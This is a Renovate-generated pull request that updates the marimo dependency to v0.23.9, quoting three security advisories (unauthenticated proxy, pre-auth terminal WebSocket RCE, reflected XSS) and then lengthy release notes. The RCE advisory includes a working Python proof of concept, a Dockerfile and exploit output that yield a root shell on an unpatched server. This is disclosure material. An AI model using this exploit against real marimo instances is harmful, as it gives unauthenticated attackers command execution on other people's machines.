chore(deps): update dependency marimo to v0.23.9 [security]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
marimo	>0.14,<0.15 → >0.14,<0.24
marimo	==0.14.17 → ==0.23.9

---

marimo vulnerable to proxy abuse of /mpl/{port}/

GHSA-xjv7-6w92-42r7

More information

Details

Summary

The /mpl/<port>/<route> endpoint, which is accessible without authentication on default Marimo installations allows for external attackers to reach internal services and arbitrary ports.

Details

From our understanding, this route is used internally to provide access to interactive matplotlib visualizations.
marimo/marimo/_server/main.py at main · marimo-team/marimo
This endpoint functions as an unauthenticated proxy, allowing an attacker to connect to any service running on the local machine via the specified <port> and <route>.

The existence of this proxy is visible in the application's code (marimo/_server/main.py), but there's no official documentation or warning about its behavior or potential risks.

Impact

CWE-441: Proxying Without Authentication

This vulnerability, as it can be used to bypass firewalls and access internal services that are intended to be local-only. The level of impact depends entirely on what services are running and accessible on the local machine.

Full Local Access: An attacker can use this proxy to connect to local services that answer to web sockets, HTTP or ASGI protocol, effectively gaining a foothold on the machine. Depending on the service, this can lead to remote code execution, data exfiltration, or further network penetration.

Exposure of Sensitive Services: Our scans of public-facing Marimo servers have shown that many are exposing sensitive internal services, including:

Old CUPS Servers: Could allow an attacker to view print jobs or configuration or depending on old vulnerabilities, allow RCE.

phpMyAdmin: Provides a web interface to a MySQL database, potentially exposing sensitive data.

RPCMapper: Can be used for network reconnaissance and enumerating services.

While you’d hope people wouldn’t expose marimo instances to the internet, we found numerous public Marimo instances using tools like Shodan. Many of these servers, some even hosted on cloud platforms like AWS GovCloud, were found to be vulnerable. This means the vulnerability isn't limited to a few isolated cases but is a widespread issue affecting production environments.

===

Notes, this was discovered by devgi. I (acepace) followed up and also created this report.

Severity

• CVSS Score: 6.9 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

References

• https://github.com/marimo-team/marimo/security/advisories/GHSA-xjv7-6w92-42r7
• https://github.com/marimo-team/marimo/commit/0312706d5e594acdb405209b2c8d87c98f46b22b
• https://github.com/marimo-team/marimo/releases/tag/0.16.4
• https://marimo-team.notion.site/cve-proxy-without-authentication
• https://github.com/advisories/GHSA-xjv7-6w92-42r7

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass

CVE-2026-39987 / GHSA-2679-6mx9-h9xc

More information

Details

Summary

Marimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.

Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.

Affected Versions

Marimo <= 0.20.4

Vulnerability Details

Root Cause: Terminal WebSocket Missing Authentication

marimo/_server/api/endpoints/terminal.py lines 340-356:

@​router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    if app_state.mode != SessionMode.EDIT:
        await websocket.close(...)
        return
    if not supports_terminal():
        await websocket.close(...)
        return
    # No authentication check!
    await websocket.accept()  # Accepts connection directly
    # ...
    child_pid, fd = pty.fork()  # Creates PTY shell

Compare with the correctly implemented /ws endpoint (ws_endpoint.py lines 67-82):

@​router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
    app_state = AppState(websocket)
    validator = WebSocketConnectionValidator(websocket, app_state)
    if not await validator.validate_auth():  # Correct auth check
        return

Authentication Middleware Limitation

Marimo uses Starlette's AuthenticationMiddleware, which marks failed auth connections as UnauthenticatedUser but does NOT actively reject WebSocket connections. Actual auth enforcement relies on endpoint-level @requires() decorators or validate_auth() calls.

The /terminal/ws endpoint has neither a @requires("edit") decorator nor a validate_auth() call, so unauthenticated WebSocket connections are accepted even when the auth middleware is active.

Attack Chain

1. WebSocket connect to ws://TARGET:2718/terminal/ws (no auth needed)
2. websocket.accept() accepts the connection directly
3. pty.fork() creates a PTY child process
4. Full interactive shell with arbitrary command execution
5. Commands run as root in default Docker deployments

A single WebSocket connection yields a complete interactive shell.

Proof of Concept

import websocket
import time

##### Connect without any authentication
ws = websocket.WebSocket()
ws.connect('ws://TARGET:2718/terminal/ws')
time.sleep(2)

##### Drain initial output
try:
    while True:
        ws.settimeout(1)
        ws.recv()
except:
    pass

##### Execute arbitrary command
ws.settimeout(10)
ws.send('id\n')
time.sleep(2)
print(ws.recv())  # uid=0(root) gid=0(root) groups=0(root)
ws.close()

Reproduction Environment

FROM python:3.12-slim
RUN pip install --no-cache-dir marimo==0.20.4
RUN mkdir -p /app/notebooks
RUN echo 'import marimo as mo; app = mo.App()' > /app/notebooks/test.py
WORKDIR /app/notebooks
EXPOSE 2718
CMD ["marimo", "edit", "--host", "0.0.0.0", "--port", "2718", "."]

Reproduction Result

With auth enabled (server generates random access_token), the exploit bypasses authentication entirely:

$ python3 exp.py http://127.0.0.1:2718 exec "id && whoami && hostname"
[+] No auth needed! Terminal WebSocket connected
[+] Output:
uid=0(root) gid=0(root) groups=0(root)
root
ddfc452129c3

Suggested Remediation

1. Add authentication validation to /terminal/ws endpoint, consistent with /ws using WebSocketConnectionValidator.validate_auth()
2. Apply unified authentication decorators or middleware interception to all WebSocket endpoints
3. Terminal functionality should only be available when explicitly enabled, not on by default

Impact

An unauthenticated attacker can obtain a full interactive root shell on the server via a single WebSocket connection. No user interaction or authentication token is required, even when authentication is enabled on the marimo instance.

Severity

• CVSS Score: 9.3 / 10 (Critical)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

References

• https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc
• https://github.com/marimo-team/marimo/pull/9098
• https://github.com/marimo-team/marimo/commit/c24d4806398f30be6b12acd6c60d1d7c68cfd12a
• https://nvd.nist.gov/vuln/detail/CVE-2026-39987
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-39987
• https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-39987
• https://www.sysdig.com/blog/marimo-oss-python-notebook-rce-from-disclosure-to-exploitation-in-under-10-hours
• https://github.com/advisories/GHSA-2679-6mx9-h9xc

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

marimo contains a reflected cross-site scripting vulnerability in the notebook page

CVE-2026-54386 / GHSA-8m59-7xv8-735h

More information

Details

marimo before 0.23.9 contains a reflected cross-site scripting vulnerability in the notebook page that allows unauthenticated attackers to inject arbitrary JavaScript by exploiting improper escaping of single quotes in the file query parameter reflected into an inline JavaScript string literal. Attackers can craft a malicious link with a payload beginning with new to bypass the 404 check and inject JavaScript into the page, which executes without Content-Security-Policy restrictions in the origin of a victim's marimo server.

Severity

• CVSS Score: 5.1 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

References

• https://nvd.nist.gov/vuln/detail/CVE-2026-54386
• https://github.com/marimo-team/marimo/pull/9789
• https://github.com/marimo-team/marimo/commit/fdd55c8cf6260ae23bb411dc9d9269def5cf75d6
• https://github.com/marimo-team/marimo/releases/tag/0.23.9
• https://www.vulncheck.com/advisories/marimo-xss-via-file-query-parameter-in-assets-py
• https://github.com/advisories/GHSA-8m59-7xv8-735h

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

marimo-team/marimo (marimo)

v0.23.9

Compare Source

What's Changed

This release makes opening a notebook in a second tab non-destructive, mo.ui.table adds new args for hidden_columns/visible_columns (mutually exclusive), and tightens sharing and error-output behavior across the board.

⭐️ Highlights

Open the same notebook in a second tab

Opening a notebook in a second browser tab no longer forcibly disconnects the first. The new tab joins as a live, read-only viewer, and you can take over editing from either side with a single click — no destructive modal and no reload required (#​9746).

Screen.Recording.2026-06-01.at.3.31.17.PM.mov

Show and hide table columns

mo.ui.table now supports column visibility. Hide and show columns from the column header menu, Column Explorer with a click, find columns fast with smart prefix-based search, and control initial visibility from Python. A hidden-count and "Unhide all" link keep things discoverable (#​9687, #​9696).

Screen.Recording.2026-05-26.at.6.35.04.PM.mov

Cells with no output now show in slides

Because slides allow code edits, a slide edited to no longer produce an output used to disappear from the deck entirely. Such cells now appear in the slides minimap and viewer so you can edit them back in (they're still skipped during a presentation). Minimap thumbnails are also larger and more readable (#​9771).

Screen.Recording.2026-06-03.at.2.25.46.PM.mov

✨ Enhancements

• Add MARIMO_RESTRICT_SHARING env var machine-wide (#​9756)
• Non-destructive local takeover (read-only viewer + bidirectional takeover) (#​9746)
• Add cells with no output to the minimap & viewer (#​9771)
• Add GET /api/kernel/status endpoint (#​9768)
• Enforce sharing config as server-side security (#​9578)
• Add filter param for regex and callable filtering (#​9667)
• Slides config panel open by default (#​9737)
• Add pair with agent link (#​9738)
• Add Opus 4.8 and script to append models to the top (#​9723)
• Remove mapping for 'src' to 'auto-mix-prep' (#​9725)
• Add workflow to automate running llm-sync-models script (#​9724)
• Automation script to pull models.yml (#​9635)
• Support Dremio ADBC data source browsing (#​9694)
• Add auto_close_pairs setting (#​9711)
• WASM compatibility rule checks (#​9587)
• Fix dropped error hints and improve error output UI (#​9673)
• Column Explorer visibility controls + smart-search (#​9696)
• Sort toml entries when writing config (#​9686)
• Pretty format hidden variable behavior in stack traces (#​9660)
• Add column visibility kwargs and UI controls (#​9687)
• Unified filter pill UI with overflow strip (#​9638)
• Add padding between cell number and minimap dependency lines (#​9675)

🐛 Bug fixes

• Escape user-controlled file_key in service worker injection (#​9789)
• Fix completions in slides view (#​9769)
• Arg/kwarg collision for local numpy vars in caching (#​9751)
• Suppress marimo hover tooltip for all LSP providers, not just pylsp (#​9741)
• Fix SQL defs lookup (#​9754)
• Keep stepped range progress totals aligned (#​9582)
• Per-provider max_tokens defaults with optional override (#​9703)
• Accept ChartDataType in mo.ui.table to resolve pyright error when passing chart.value (#​9674)
• Jump to running notebook cells only (#​9707)
• Fix mo.cache raising KeyError: 'scratch' in scratchpad (#​9664)
• Fix interruption for pydantic-ai chatbot (#​9620)
• Preserve top level names for name thrashing (#​9695)
• Lazy download-size RPC + first-page extrapolation (#​9691)

📚 Documentation

• Add config to disable AI (#​9739)
• Update molab docs with new compute and sharing features (#​9748)

📝 Other changes

• Don't shadow builtin print unless mo.Thread is used (#​9765, #​9766)
• Zz/zt/zb scroll for notebook viewport (#​9701, #​9728)
• Add rule to prevent test files from having the same name (#​9671)

Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​corleyma, @​dmadisetti, @​everettroeth, @​foxcroftjn, @​GHX5T-SOL, @​kirangadhave, @​kjgoodrick, @​kratos0718, @​Light2Dark, @​mscolnick, @​nojaf, @​Rowlando13, @​VishakBaddur, @​XanthanGum

And especially to our new contributors:

• @​everettroeth made their first contribution in #​9664
• @​foxcroftjn made their first contribution in #​9686
• @​GHX5T-SOL made their first contribution in #​9582
• @​kratos0718 made their first contribution in #​9667
• @​XanthanGum made their first contribution in #​9725

Full Changelog: marimo-team/marimo@0.23.8...0.23.9

v0.23.8

Compare Source

v0.23.7

Compare Source

What's Changed

This release brings major upgrades to table filtering, adds speaker notes to slide view, and lets WASM notebooks query remote files with DuckDB.

⭐ Highlights

Powerful new table column filters

Table columns now support the full operator set across every dtype. Text columns get contains, starts_with, ends_with, equals, regex, is_empty, and more, with a slash-bracketed regex input and a creatable values picker for in / not_in. Number columns get native between, and the new date/datetime/time filter UI brings the same operator coverage to date-like columns with smart clipboard paste for ISO/US/RFC dates and A - B ranges (#​9597, #​9615).

Screen.Recording.2026-05-18.at.7.54.06.PM.mov

Speaker notes for slides

Press S in slide view to open speaker notes alongside the current slide, including in fullscreen and kiosk mode (#​9533).

Screen.Recording.2026-05-12.at.5.32.23.PM.mov

Query remote files with DuckDB in WASM notebooks

WASM notebooks can now read CSV, Parquet, JSON, and GeoJSON over HTTP from mo.sql, SQL cells, raw duckdb.sql/query/execute, connection SQL methods, and the duckdb.read_csv/read_parquet/read_json Python API. marimo rewrites the AST with sqlglot, fetches the remote file via its shared WASM fetch util, and binds the result as a pandas DataFrame that DuckDB can scan (#​9480).

SELECT * FROM read_csv('https://example.com/cars.csv')

✨ Enhancements

• Expand column filter operators and pill-editor UX (#​9597)
• Date/datetime/time filter UI (#​9615)
• Add speaker notes for slides (#​9533)
• Support HTTP DuckDB queries in WASM notebooks (#​9480)
• Snapshot document and outputs in MCP execute_code (#​9654)
• Rename ctx.notify to broadcast_raw_notification (#​9581)
• Record staleness reads on .code access only (#​9655)
• Expose cell outputs to code_mode (#​9653)
• Make marimo new CLI help page render properly at 80 columns (#​9636)
• Read-before-write protection for cell edits (#​9585)
• Skip stdlib/site-packages on per-cell check (#​9629)
• Show cell index in dependency minimap (#​9633)
• Extract ModuleReloader/ModuleWatcher into AutoreloadManager (#​9590)
• DRY up code between wasm and native kernel (#​9591)
• Update default duckdb mo.sql deps (#​9599)
• Show .git and .venv in file browser (#​9606)
• Support disabled on dropdown and multiselect (#​9600)
• Split kernel command dispatch into router + callback bundles (#​9577)
• Add Prompt tab to pair-with-agent modal (#​9568)
• Replace MarimoFileKey alias with FileKey ADT (#​9483)
• Optimize memoize_last_value for faster UI reactivity (#​9555)
• Hardening pass — utilities, deprecated API cleanup, lifespan fix (#​9552)
• Stream uploads to disk instead of buffering (#​9527)
• Add kernel_session() as context manager, DRY up tests (#​9554)
• Sandboxed exports for consistent wasm envs (#​9519)
• Add tool approval flow for chat-panel (#​9507)
• Remove input for hidden cells from exports (#​9548)
• Parallelize file uploads with bounded concurrency (#​9528)
• Use multipart/form-data for /api/files/create (#​9521)
• Show loading and success toasts for exports (#​9509)
• Add cut cells command (#​8019)
• Allow def declarations within functions (#​9379)
• Correlate scratchpad completion with run_id (#​9350)
• Make disconnect indicator clickable to reconnect (#​9410)

🐛 Bug fixes

• Guard SQL ref extraction on sqlglot availability (#​9656)
• Fix lru_cache(...) resetting when cell is rerun (#​9609)
• Skip reload when notebook has git conflict markers (#​9626)
• Stream lazy-polars output via pl(lazy=True) (#​9648)
• Trigger downloads programmatically to work inside cross-origin iframes (#​9649)
• Stdin handling for empty submissions (#​9556)
• Avoid pyarrow requirement for polars output in DuckDB engine (#​9643)
• Isolate test_project_dependencies from pyproject.toml pollution (#​9634)
• Restore selection_mode='all' and accept list form (#​9630)
• Allow freezing pandas index columns (#​9631)
• Inline public/ images in static HTML export (#​9627)
• Remove unused flush_messages plumbing (#​9598)
• Migrate remaining background-task sites to asyncio_utils (#​9596)
• Normalize dev version in static notebook asset URL (#​9592)
• JSON-escape > and < in web-component attrs (#​9595)
• Render Enum members as str in JSON serializer (#​9594)
• Narrow callback deps, drop get_context in cache (#​9589)
• Callback bug fixes in cache clear, dataset connections, and model updates (#​9588)
• Avoid treating class-like array refs as data primitives (#​9569)
• Group kernel streams into KernelStreams; phase-key NotebookCellHooks (#​9571)
• Pass theme to register_formatters in pyodide and script runner (#​9553)
• Use Referrer-Policy same-origin to fix Chrome 147+ Error code 5 on macOS (#​9543)
• Extract shared kernel lifecycle for subprocess and pyodide (#​9541)
• Hide watermark when printing (#​9525)
• Markdown singleton to mitigate reported race condition (#​9530)
• Contain comm callback errors in mpl_interactive (#​9532)
• Disconnect toolbar callbacks on cell rerun (#​9531)
• Fix overflow and support vertical tabs (#​9511)
• Allow hosts to size-gate downloads (#​9510)
• Detect marimo notebooks with long module docstrings (#​9652)
• Fix argument splitting on '--' in the command line (#​9368)

📚 Documentation

• Update markdown_indentation.md (#​9622)
• Standardize supported dataframe backends across UI elements (#​9583)
• Attribution (#​9608)
• Polish tutorial notebooks (#​9573)
• Add detailed docstring for CLI recover command (#​9546)
• Note that an added notebook will be downloaded if it's a URL path (#​9545)
• Clarify that marimo run hides source code by default (#​9529)
• Add Mermaid theme customization options (#​9478)
• Remove formatter recommendation section from guide (#​9434)

📝 Other changes

• Enforce single backticks in Python docstrings (markdown, not RST) (#​9645)
• Add data-testid to top-level chrome elements (#​9566)
• Fix pnpm-workspace.yaml configuration (#​9574)
• Fix pnpm-workspace.yaml configuration (#​9515)

Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​archpulse, @​arghaffari, @​dmadisetti, @​jeremytanjianle, @​JoostGevaert, @​kirangadhave, @​leoadberg, @​Light2Dark, @​manzt, @​mchav, @​mscolnick, @​peter-gy, @​Rowlando13, @​Shamik-07, @​williambdean

And especially to our new contributors:

• @​archpulse made their first contribution in #​9555
• @​arghaffari made their first contribution in #​9543
• @​jeremytanjianle made their first contribution in #​9569
• @​leoadberg made their first contribution in #​9609
• @​Rowlando13 made their first contribution in #​9636
• @​Shamik-07 made their first contribution in #​9379

Full Changelog: marimo-team/marimo@0.23.6...0.23.7

v0.23.6

Compare Source

What's Changed

🚨 Breaking changes

• Propagate notebook filename through MarimoIslandGenerator.from_file (#​9409). This is a correctness fix, but could break existing users who relied on broken assumptions.

✨ Enhancements

• Implement kernel exit classification and notification system (#​9500)
• Render notebook snapshot while Pyodide initializes (#​9502)
• hide add cell toolbar when show-chrome is false (#​9487)
• Add gpt-5.5 support (#​9488)
• Extract NotebookWorkspace from AppFileRouter (#​9448)
• Add new W&B models to llm-info data (#​9465)
• Add --execute to marimo export html-wasm for session previews (#​9437)

🐛 Bug fixes

• Send initial size when WebSocket opens (#​9505)
• Restore --proxy for base_url (#​9503)
• Avoid exponential blow-up of nested struct sample values (#​9506)
• Normalize Windows backslashes in inserted image URLs (#​9504)
• Skip wasm controller dynamic import unless host opts in (#​9467)
• fix label alignment (#​9486)
• standardize (y/n) prompt defaults (#​9492)
• Skip /health checks for static notebooks (#​9498)
• Avoid RecursionError when formatting objects with getattr traps (#​9497)
• Prevent mpl figure DPI from compounding on cell rerun (#​9474)
• use unified thinking for pydantic-ai (#​9477)
• Remount on src change in mo.Html to avoid stale paint (#​9472)
• Fix UI hang and stabilize tests for unusual tuple/list/dict child classes (#​9468)
• Include cell_manager in TransactionSource literal (#​9457)
• Improve parameter validation error messages for list[NewType] fields (#​9442)

📚 Documentation

• OpenCode Go config (#​9431)
• Add slides documentation and video (#​9464)
• Additional security acknowledgements (#​9450)

📝 Other changes

• Support HTTP Range requests on virtual files (#​9460) (#​9473) (26ee423)
• Update all storybook dependencies to ^10.3.5 (#​9392)

Contributors

Thanks to all our community and contributors who made this release possible: @​app/renovate, @​dmadisetti, @​domwst, @​fonnesbeck, @​kirangadhave, @​Light2Dark, @​ljchang, @​mchav, @​mscolnick, @​ralphptorres, @​stephenlf, @​wally-an

New Contributors

• @​wally-an made their first contribution in #​9442
• @​ljchang made their first contribution in #​9409
• @​fonnesbeck made their first contribution in #​9431
• @​domwst made their first contribution in #​9488
• @​ralphptorres made their first contribution in #​9492

Full Changelog: marimo-team/marimo@0.23.5...0.23.6

v0.23.5

Compare Source

What's Changed

This release adds editable code in slide view, OpenTelemetry distributed tracing support, and patches polars network I/O in WASM notebooks.

⭐ Highlights

Editable code in slide view

Press C (or click the code icon) in slide view to toggle an inline code editor under each slide, including in fullscreen mode. Run mode shows a read-only editor when include-code is enabled.

✨ Enhancements

• Add OTLP export and W3C trace context propagation to tracing (#​9414)
• Add editable code in slide view (#​9389)
• Patch polars I/O in wasm (#​9413)
• Add a CLI tip for marimo pair (#​9422)
• Prompt user to build fe at first run (#​9381)

🐛 Bug fixes

• Provide upper bound on jedi pin (#​9449)
• Force Content-Disposition on table export downloads (#​9426)

📚 Documentation

• Update marimo-pair docs to mention molab (#​9436)

📝 Other changes

• Add load_notebook helper, simplify AppFileRouter (#​9438)
• Add data-testids to file-explorer dropdown menu items (#​9427)
• Deflake subprocess kill test (#​9423)
• CI: doppler secrets (#​9236)

Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​dmadisetti, @​koaning, @​Light2Dark, @​mscolnick, @​ouatu-ro, @​tigretigre

Full Changelog: marimo-team/marimo@0.23.4...0.23.5

v0.23.4

Compare Source

What's Changed

✨ Enhancements

• Update snapshots and types for altair v6.1.0 / vega-lite v6.4.1 (#​9415)
• make _format_plan respect format_on_save; format enabled/disabled unit tests (#​9380)
• standardize top k filter components and logic (#​9393)
• Editable filter pills (#​9349)

🐛 Bug fixes

• allow cell selection on non-interactive marimo elements (#​9399)
• adjust ordering of header (#​9403)
• Msgspec encoding for starlette user (#​9406)
• Check platform instead of sys.modules for pyodide check (#​9404)
• Docs typo (#​9400)
• Scope filter-by-values top-K to exclude the filter being edited (#​9376)
• Hide marimo-pair in wasm, fix opencode prompt (#​9375)
• Mark DuckDb INET type (from inet extension) as unknown type (#​9384)
• Add Path to cookie (#​9364)

📚 Documentation

• Documentation Bugfix: Polars cannot read json from URL (#​9397)

📝 Other changes

• Update dependency postcss to ^8.5.10 (#​9334)
• Update dependency postcss to v8.5.10 [security] (#​9372)

Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​app/renovate, @​daniel-bogdoll, @​dmadisetti, @​iggylari, @​jpopesculian, @​kirangadhave, @​Light2Dark, @​mscolnick, @​ouatu-ro

New Contributors

• @​iggylari made their first contribution in #​9384
• @​daniel-bogdoll made their first contribution in #​9397
• @​ouatu-ro made their first contribution in #​9380

Full Changelog: marimo-team/marimo@0.23.3...0.23.4

v0.23.3

Compare Source

What's Changed

✨ Enhancements

• Add slide config form in sidebar, and reveal slide types (#​9300)
• Restore LICENSE in sdist via PEP 639 license-files (#​9341)
• Status indicator for PDF exports via CLI (#​9322)
• workspace management: add hooks, and shared components (#​9272)

🐛 Bug fixes

• Guard _resolve_proxy against bare-port inputs (#​9366)
• Guard _references_virtual_file against cyclic data (#​9369)
• Decode tuple/frozenset payloads with non-finite floats (#​9365)
• Return html encoded matplotlib Figure from msgspec encoder hook (#​9359)
• Harden trust-bearing window globals and gate script loading (#​9330)
• fix markdown .center, .right, .left not respecting new lines (#​9326)
• File navigator (#​9307)
• Add _MARIMO_DISABLE_AUTH_ON_VIRTUAL_FILES env flag (#​9343)
• Correct AWS Bedrock Claude model IDs (#​9299)
• Kill kernel's process group on shutdown (#​9257)
• Add DataFusionFormatter (#​9338)
• Preserve shared-memory virtual files owned by other live sessions (#​9228)
• Update CsvViewer layout to use flex column. (#​9336)
• Emit relative Location on login redirect (#​9314)
• bump pymdown-extensions to fix NoneType bug (#​9319)
• Trust exported notebook pages (#​9318)
• Preserve non-string dict keys in rich display (#​9301)
• Update dataflow.md.txt snapshot (#​9315)
• Fix type-check Channel.Pull with NewType and union msg_type (#​9296)

📚 Documentation

• Specify html is only in app mode (#​9333)
• Fix typo in documentation for dataflow.py (#​9173)

📝 Other changes

• Flush console output buffer before marking cell idle (#​9164) (f0187ea)
• Resolve relative path sources in --sandbox uv export (#​9052) (ccc1841)
• use union for narwhals files (#​9156) (58543f6)
• Update dependency @​playwright/test to ^1.59.1 (#​9295)
• Replace pickle with msgspec for IPC serialization (#​8713) (df4e40c)

Contributors

Thanks to all our community and contributors who made this release possible: @​akshayka, @​app/renovate, @​bfriebel, @​dmadisetti, @​Light2Dark, @​manzt, @​mchav, @​mscolnick, @​NewDestinyDan, @​peter-gy, @​shaun0927

New Contributors

• @​NewDestinyDan made their first contribution in #​9173
• @​bfriebel made their first contribution in #​9359

Full Changelog: marimo-team/marimo@0.23.2...0.23.3

v0.23.2

Compare Source

What's Changed

🚨 Breaking changes

• Mo.ui.refresh typing and docs (#​9229)

✨ Enhancements

• Code-mode .screenshot() api (#​9232)
• Visible markers for leading/trailing whitespace in string cells (#​9256)
• swap reveal.js instead of swiper for slides (#​9166)
• change wasm link to molab link on run page (#​9240)
• Bail out of type inference when completion budget expires (#​9247)
• Introduce better_inspect module for enhanced dir() and help() functionality for marimo-pair (#​9223)
• add molab resource to edit homepage (#​9241)
• Add ctx.packages namespace to code mode (#​9233)
• Backend-based file and directory duplication (#​9142)
• Support columns in marimo-pair (#​9212)
• Expand uv_build supported versions in build-system (#​9231)
• Visually distinguish null, empty, whitespace, NaN, and Infinity in table cells (#​9218)
• Restore Altair SVG output as base64-encoded Data URLs (#​9104)
• Auto-save in code-mode and marimo-pair (#​9191)
• add molab share action (#​9207)
• LSP root and document URI integration from backend (#​9143)
• Decouple Matplotlib render resolution (DPI) from display size (#​9144)

🐛 Bug fixes

• Hold references to asyncio tasks (#​9261)
• Use urlparse instead of regex for proxy determination (#​9254)
• Preserve columns in DefaultTableManager exports (#​9258)
• Drop dangling @​file URLs from the session cache (#​9278)
• Make FieldTypes a Map to preserve column order (#​9279)
• Avoid double-mangling names inside walrus comprehension (#​9276)
• Static path handling (#​9281)
• Restore plain text tracebacks and fix exit codes for cod

✂ Note

PR body was truncated to here.

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • At any time (no schedule defined)
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.